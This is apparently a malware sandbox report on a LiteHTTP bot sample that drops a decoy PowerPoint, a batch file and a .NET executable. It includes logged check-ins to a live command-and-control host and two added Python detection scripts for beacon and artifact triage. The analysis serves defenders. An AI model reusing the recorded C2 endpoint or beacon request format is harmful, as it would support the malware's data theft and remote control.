185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1; User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3; Content-Type: application/x-www-form-urlencoded; Host: sevenxi.xyz; Content-Length: 427; Expect: 100-continue; Connection: Keep-Alive (response: 100 Continue) |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1; User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3; Content-Type: application/x-www-form-urlencoded; Host: sevenxi.xyz; Content-Length: 427; Expect: 100-continue; Connection: Keep-Alive (response: 100 Continue) |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1; User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3; Content-Type: application/x-www-form-urlencoded; Host: sevenxi.xyz; Content-Length: 427; Expect: 100-continue; Connection: Keep-Alive (response: 100 Continue) |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1; User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3; Content-Type: application/x-www-form-urlencoded; Host: sevenxi.xyz; Content-Length: 427; Expect: 100-continue; Connection: Keep-Alive (response: 100 Continue) |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1; User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3; Content-Type: application/x-www-form-urlencoded; Host: sevenxi.xyz; Content-Length: 427; Expect: 100-continue; Connection: Keep-Alive (response: 100 Continue) |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1; User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3; Content-Type: application/x-www-form-urlencoded; Host: sevenxi.xyz; Content-Length: 427; Expect: 100-continue; Connection: Keep-Alive (response: 100 Continue) |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1; User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3; Content-Type: application/x-www-form-urlencoded; Host: sevenxi.xyz; Content-Length: 427; Expect: 100-continue; Connection: Keep-Alive (response: 100 Continue) |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1; User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3; Content-Type: application/x-www-form-urlencoded; Host: sevenxi.xyz; Content-Length: 427; Expect: 100-continue; Connection: Keep-Alive (response: 100 Continue) |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1; User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3; Content-Type: application/x-www-form-urlencoded; Host: sevenxi.xyz; Content-Length: 427; Expect: 100-continue; Connection: Keep-Alive (response: 100 Continue) |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 185.117.75.48:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin | 2819705 |
(This alert was raised 14 times in total, each time on TCP traffic from the guest to 185.117.75.48:80.)
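A practitioner looking at the HTTP table and the Suricata rows above would want a reusable check rather than a reread of the headers. The Python below is an added example, not part of the Hybrid Analysis report and not the Emerging Threats rule (SID 2819705, whose content is not reproduced here). It parses raw HTTP/1.1 request headers, scores each request against traits visible in the recorded check-in (a form-urlencoded POST to a .php endpoint, a bare 32-hex User-Agent in place of a product token, Expect: 100-continue, which the .NET HttpWebRequest class adds to POSTs by default) and counts exact repeats of the same request as a further beaconing signal. The request text is copied from the report; the benign GET request, the indicator names and the thresholds are this example's own assumptions.

```python
"""Beacon triage for HTTP check-ins of the kind recorded above.

Added example, not part of the sandbox report or of any Suricata rule.
The bot request text is copied from the report; the benign request, the
indicator names and the thresholds are constructed for illustration.
"""
import re
from collections import Counter

# A bare 32-hex token where a product/version string would normally be.
HEX32 = re.compile(r"^[0-9A-Fa-f]{32}$")

# Constructed sample input: the check-in as logged in the HTTP table above.
BOT_REQUEST = (
    "POST /sharp/r3set/page.php HTTP/1.1\r\n"
    "User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: sevenxi.xyz\r\n"
    "Content-Length: 427\r\n"
    "Expect: 100-continue\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# Constructed benign request for contrast (not from the report).
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36\r\n"
    "Host: example.com\r\n"
    "Accept: text/html\r\n"
    "\r\n"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, {lowercased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def checkin_indicators(raw):
    """Names of the check-in traits a single request exhibits, in fixed order."""
    method, path, h = parse_request(raw)
    hits = []
    if method == "POST" and h.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        hits.append("form_post")
    if HEX32.match(h.get("user-agent", "")):
        hits.append("hash_user_agent")      # bot ID sent as the UA, no product token
    if h.get("expect", "").lower() == "100-continue":
        hits.append("expect_100_continue")  # default for POSTs made with .NET HttpWebRequest
    if path.lower().endswith(".php") and "accept" not in h:
        hits.append("php_endpoint_no_accept")
    return hits


def beacon_key(raw):
    """Tuple that is identical for every repeat of the same check-in."""
    method, path, h = parse_request(raw)
    return (method, h.get("host"), path, h.get("user-agent"), h.get("content-length"))


def triage(requests, threshold=3, min_repeats=3):
    """Return {beacon_key: indicators} for requests worth escalating.

    Exact repetition of one request (same host, path, UA and body size)
    counts as one more indicator once it reaches min_repeats.
    """
    repeats = Counter(beacon_key(r) for r in requests)
    flagged = {}
    for raw in requests:
        key = beacon_key(raw)
        hits = checkin_indicators(raw)
        if repeats[key] >= min_repeats:
            hits = hits + ["repeated_%d_times" % repeats[key]]
        if len(hits) >= threshold:
            flagged[key] = hits
    return flagged


if __name__ == "__main__":
    for key, hits in triage([BOT_REQUEST] * 5 + [BENIGN_REQUEST]).items():
        print(key[1], key[2], hits)
```

Feed `triage()` the request strings exported from a proxy log or a PCAP; the repeat counter is what separates a periodic check-in from a one-off form submission, so keep `min_repeats` low and raise `threshold` if a proxy with many legitimate .NET clients generates noise on the Expect header alone.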
Extracted Strings
Extracted Files
-
Informative Selection (7 files)
-
GB9R5TCIOUEB9XX9HLKX.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 3508)
- MD5
- 8f79f0a7f721bfaeb7ca7d8b9ea15c9f
- SHA1
- 1ce81512ad8d8724f0ae37f6fc1cad6ad7b8d01b
- SHA256
- 300c8efda9eefc7d2792ce1c091f82c01f428472e846a7d782d194bf099d81e7
-
ZXDHRFEVKQIGKVFQV7CC.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 2444)
- MD5
- 8f79f0a7f721bfaeb7ca7d8b9ea15c9f
- SHA1
- 1ce81512ad8d8724f0ae37f6fc1cad6ad7b8d01b
- SHA256
- 300c8efda9eefc7d2792ce1c091f82c01f428472e846a7d782d194bf099d81e7
-
6ljpalv5.cmdline
- Size
- 313B (313 bytes)
- Type
- text
- Description
- UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
- Runtime Process
- csc.exe (PID: 2636)
- MD5
- cf5b2f82869a2ee45430221b4d8b80ff
- SHA1
- 57005f1c93b8c60e21d784c27a418b35dfcc59ff
- SHA256
- 7e215c422f03d69ae653398a55e406da6de65fb988b44e2b3b4cfd4541f53e0d
-
CSCA6C9.tmp
- Size
- 652B (652 bytes)
- Type
- unknown
- Description
- MSVC .res
- Runtime Process
- csc.exe (PID: 2636)
- MD5
- fbdaf9f1365ec5bed999116a74c4f6e9
- SHA1
- 4b96b633083c074fb54a1106b7fa2eb009e7a483
- SHA256
- 6e85a72fdf202930d0b754aca2f51818f662be58af7d871e6be2e0d2db6daf53
-
RESA6DE.tmp
- Size
- 1.2KiB (1204 bytes)
- Type
- unknown
- Description
- 80386 COFF executable not stripped - version 25189
- Runtime Process
- csc.exe (PID: 2636)
- MD5
- 26915401736497bb9342f319170597b7
- SHA1
- 9e6fdcebd7b43912ffbef64e5c30823dd2ddb9b0
- SHA256
- 0b900221bf0695018c4161b103770802ce60150c0d398430e923fafd58bd464e
-
energies.ppt
- Size
- 2MiB (2051584 bytes)
- Type
- ppt office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1252, Title: Gabarit formation STI2D, Author: GRANJON David, Last Saved By: ENAULT, Revision Number: 453, Name of Creating Application: Microsoft Office PowerPoint, Total Editing Time: 3d+07:31:43, Last Printed: Wed Feb 15 10:56:10 2012, Create Time/Date: Tue Sep 14 06:05:30 2010, Last Saved Time/Date: Mon Mar 26 10:55:04 2012, Number of Words: 2411
- Runtime Process
- 7d12ea86d696f05082a7560972bf221ff6e588f5e36a9b96b1feaaf706f7b51e.exe (PID: 3500)
- MD5
- d3c684b7ecce11ad8bf994dc172969a2
- SHA1
- e30ca5284c74376c238b23853e1c542fd56c1567
- SHA256
- 2deab96f57eba7b2bec1967ee3374b4703ff5183a6df0a5291906af46e9899ad
-
local.bat
- Size
- 6.9KiB (7110 bytes)
- Type
- text
- Description
- ASCII text, with very long lines, with CRLF line terminators
- Runtime Process
- 7d12ea86d696f05082a7560972bf221ff6e588f5e36a9b96b1feaaf706f7b51e.exe (PID: 3500)
- MD5
- cbde8477c4eca8f816514bd20b313dc3
- SHA1
- 3ebbbdc5e7fbe545f746da16899f7bc67ee207eb
- SHA256
- c5d3094458e672bfe18bd06f7db97e0a5da3b9239b912650420f2036acf435dd
-
Informative (11 files)
-
energies.LNK
- Size
- 1.1KiB (1161 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Nov 20 22:39:57 2017, mtime=Mon Nov 20 22:39:57 2017, atime=Mon Nov 20 22:39:57 2017, length=2051584, window=hide
- Runtime Process
- POWERPNT.EXE (PID: 3664)
- MD5
- 003a242e3b8ccf6801261bbc5568181b
- SHA1
- 5f044ff0dbc40ddf3ab2cd61ab166ca27bf58c7d
- SHA256
- b2611be59dd817b2ff6b4b1b516a1b76d75015a8d529d61f8ff8cb6e840fe17a
-
index.dat
- Size
- 145B (145 bytes)
- Type
- data
- Runtime Process
- POWERPNT.EXE (PID: 3664)
- MD5
- ab40edc4dbd8e4eb22f9deceb7bc5ce0
- SHA1
- ebce1cf674e8dc1f7160a75d499724d57f19db2e
- SHA256
- 10e9cc4685a0c29f692900d61c80b2870616108a027cd30070d0f920ef26ea3f
-
K4R3057IRAU7L1AL6CBG.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 3596)
- MD5
- 8f79f0a7f721bfaeb7ca7d8b9ea15c9f
- SHA1
- 1ce81512ad8d8724f0ae37f6fc1cad6ad7b8d01b
- SHA256
- 300c8efda9eefc7d2792ce1c091f82c01f428472e846a7d782d194bf099d81e7
-
565950BA.wmf
- Size
- 27KiB (27220 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- POWERPNT.EXE (PID: 3664)
- MD5
- 64ef32ef95c729abf26d8ad29f10144d
- SHA1
- 4ebf3a90f19db422194eb8b43700c66d1ddacc16
- SHA256
- 889066483bbeb31528422ef1065b62bc31b74748fc8b8340dfafd5df6cb89c12
-
565AB65D.wmf
- Size
- 3.9KiB (4008 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- POWERPNT.EXE (PID: 3664)
- MD5
- eda307d1737ee1d4e8e09f00302e145b
- SHA1
- d89e8b60c2cf9f662fd50ce2802641d98754f320
- SHA256
- 978e16611768ecc6481f05573204bbffd8f2c9955e4f38df5687b1703d9250ef
-
DADD3573.wmf
- Size
- 17KiB (17514 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- POWERPNT.EXE (PID: 3664)
- MD5
- 99e946e0e7fa064a272336973441f6bd
- SHA1
- a882a12029a8aef832bb376d2ab05e6c17d18775
- SHA256
- c48de83c8f28c89e64972391a78cc1193eb0cf0d99f26c760b3da20b7f5ef291
-
0XP.exe
- Size
- 21KiB (21504 bytes)
- Type
- peexe assembly executable
- Description
- PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
- Runtime Process
- 7d12ea86d696f05082a7560972bf221ff6e588f5e36a9b96b1feaaf706f7b51e.exe (PID: 3500)
- MD5
- 195910f74e0fdfd6de16c704d930c218
- SHA1
- 57167534825e3cfe3a4dde91291b76d4af3b056b
- SHA256
- d68eb898dcef9cea1da659ea5ae5540f7059ece31e69c1f27b7a00e24524121f
-
6ljpalv5.0.cs
- Size
- 557B (557 bytes)
- Type
- text
- Description
- UTF-8 Unicode (with BOM) text, with very long lines
- Runtime Process
- csc.exe (PID: 2636)
- MD5
- 7319070c34daa5f6f2ece2dfc07119ee
- SHA1
- f26a4a48518a5608e93c8b77368f588b0433973c
- SHA256
- b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc
-
6ljpalv5.dll
- Size
- 3.5KiB (3584 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
- Runtime Process
- csc.exe (PID: 2636)
- MD5
- f09698c73ed8c5653e1bd8250689aa9b
- SHA1
- 77efd415ce433c0e2a86bcd568d0453e9164b41f
- SHA256
- 2be1edd06693e89eb1447b29adf44a1e735ea6447558bdc940314f2e991cb126
-
6ljpalv5.out
- Size
- 578B (578 bytes)
- Type
- text
- Description
- UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
- Runtime Process
- csc.exe (PID: 2636)
- MD5
- a4d61d4030d34044683590463f821ffb
- SHA1
- 0610cf47b1f05b438e2af6a6fea0ce5f7248363f
- SHA256
- 393935b16bfc5ca3f580a0457d54718b5c6ecaafb6c62c539dde3548741f9cda
-
6ljpalv5.pdb
- Size
- 7.5KiB (7680 bytes)
- Type
- data
- Description
- MSVC program database ver \002
- Runtime Process
- csc.exe (PID: 2636)
- MD5
- 7abe06b2b59c8a14b935bbde3b968c47
- SHA1
- ff11c8db44ea57572ea39375a39f099628f65b36
- SHA256
- a73a1e7dc77ca70078757f9d9ae6341442b0352fe2eae6e093c8b0ce837251b3
-
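The extracted-file list above reads faster by machine. The Python below is an added example, not part of the Hybrid Analysis report: the records are copied from the entries above (SHA256 shortened to its first eight hex digits) into a plain list, and the checks an analyst would run over them follow: content that recurs under different names, csc.exe output sets with the `<stem>.cmdline` / `<stem>.0.cs` / `<stem>.dll` shape that PowerShell's Add-Type leaves behind when it compiles C# at run time, files written by the submitted sample itself with executables listed first, and a per-process writer count. The `Rec` field names and the `ADD_TYPE_SET` signature are this example's own assumptions.

```python
"""Triage of an extracted-file list like the one above.

Added example, not part of the Hybrid Analysis report.  The records are
copied from the report's entries (SHA256 shortened to its first eight hex
digits); the field names and the Add-Type signature set are this example's.
"""
from collections import defaultdict, namedtuple

Rec = namedtuple("Rec", "name size ftype proc pid sha256")

# Process image of the submitted sample, as named in the entries above.
SAMPLE_IMAGE = "7d12ea86d696f05082a7560972bf221ff6e588f5e36a9b96b1feaaf706f7b51e.exe"

# Constructed from the report's Extracted Files entries.
FILES = [
    Rec("GB9R5TCIOUEB9XX9HLKX.temp", 8016, "data", "powershell.exe", 3508, "300c8efd"),
    Rec("ZXDHRFEVKQIGKVFQV7CC.temp", 8016, "data", "powershell.exe", 2444, "300c8efd"),
    Rec("K4R3057IRAU7L1AL6CBG.temp", 8016, "data", "powershell.exe", 3596, "300c8efd"),
    Rec("6ljpalv5.cmdline", 313, "text", "csc.exe", 2636, "7e215c42"),
    Rec("6ljpalv5.0.cs", 557, "text", "csc.exe", 2636, "b240a9bb"),
    Rec("6ljpalv5.dll", 3584, "pedll executable", "csc.exe", 2636, "2be1edd0"),
    Rec("6ljpalv5.out", 578, "text", "csc.exe", 2636, "393935b1"),
    Rec("6ljpalv5.pdb", 7680, "data", "csc.exe", 2636, "a73a1e7d"),
    Rec("CSCA6C9.tmp", 652, "unknown", "csc.exe", 2636, "6e85a72f"),
    Rec("RESA6DE.tmp", 1204, "unknown", "csc.exe", 2636, "0b900221"),
    Rec("energies.ppt", 2051584, "ppt office", SAMPLE_IMAGE, 3500, "2deab96f"),
    Rec("local.bat", 7110, "text", SAMPLE_IMAGE, 3500, "c5d30944"),
    Rec("0XP.exe", 21504, "peexe assembly executable", SAMPLE_IMAGE, 3500, "d68eb898"),
    Rec("energies.LNK", 1161, "lnk", "POWERPNT.EXE", 3664, "b2611be5"),
    Rec("index.dat", 145, "data", "POWERPNT.EXE", 3664, "10e9cc46"),
]

# Files csc.exe reads and writes when PowerShell's Add-Type compiles C# at run time.
ADD_TYPE_SET = {"cmdline", "0.cs", "dll"}


def duplicate_content(files):
    """{sha256: [names]} for content that recurs under more than one name."""
    by_hash = defaultdict(list)
    for f in files:
        by_hash[f.sha256].append(f.name)
    return {h: sorted(n) for h, n in by_hash.items() if len(n) > 1}


def addtype_compiles(files):
    """{stem: [extensions]} for csc.exe output sets with the Add-Type shape."""
    by_stem = defaultdict(set)
    for f in files:
        if f.proc.lower() == "csc.exe" and "." in f.name:
            stem, ext = f.name.split(".", 1)   # "6ljpalv5.0.cs" -> ("6ljpalv5", "0.cs")
            by_stem[stem].add(ext)
    return {s: sorted(e) for s, e in by_stem.items() if ADD_TYPE_SET <= e}


def dropped_by_sample(files, image=SAMPLE_IMAGE):
    """Files the submitted sample wrote itself, executables first."""
    mine = [f for f in files if f.proc == image]
    return sorted(mine, key=lambda f: ("executable" not in f.ftype, f.name))


def writers(files):
    """{(process, pid): file count}, to see which processes did the writing."""
    counts = defaultdict(int)
    for f in files:
        counts[(f.proc, f.pid)] += 1
    return dict(counts)


if __name__ == "__main__":
    print("duplicates:", duplicate_content(FILES))
    print("Add-Type compiles:", addtype_compiles(FILES))
    print("dropped by sample:", [f.name for f in dropped_by_sample(FILES)])
    print("writers:", writers(FILES))
```

On this report the three checks point at the same chain: the sample drops a .NET assembly (0XP.exe) next to a decoy PowerPoint and a batch file, and a PowerShell child compiles C# through csc.exe, which is the artifact set to hunt for in %TEMP% on other hosts.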
Notifications
-
Runtime
- Not all file accesses are visible for cmd.exe (PID: 2280)
- Not all file accesses are visible for csc.exe (PID: 2636)
- Not all file accesses are visible for cvtres.exe (PID: 3780)
- Not all file accesses are visible for mode.com (PID: 3512)
- Not all file accesses are visible for powershell.exe (PID: 2444)
- Not all file accesses are visible for powershell.exe (PID: 3508)
- Not all file accesses are visible for powershell.exe (PID: 3596)
- Not all sources for signature ID "api-51" are available in the report
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "api-70" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report
- Not all sources for signature ID "mutant-0" are available in the report
- Not all sources for signature ID "registry-1" are available in the report
- Not all sources for signature ID "registry-25" are available in the report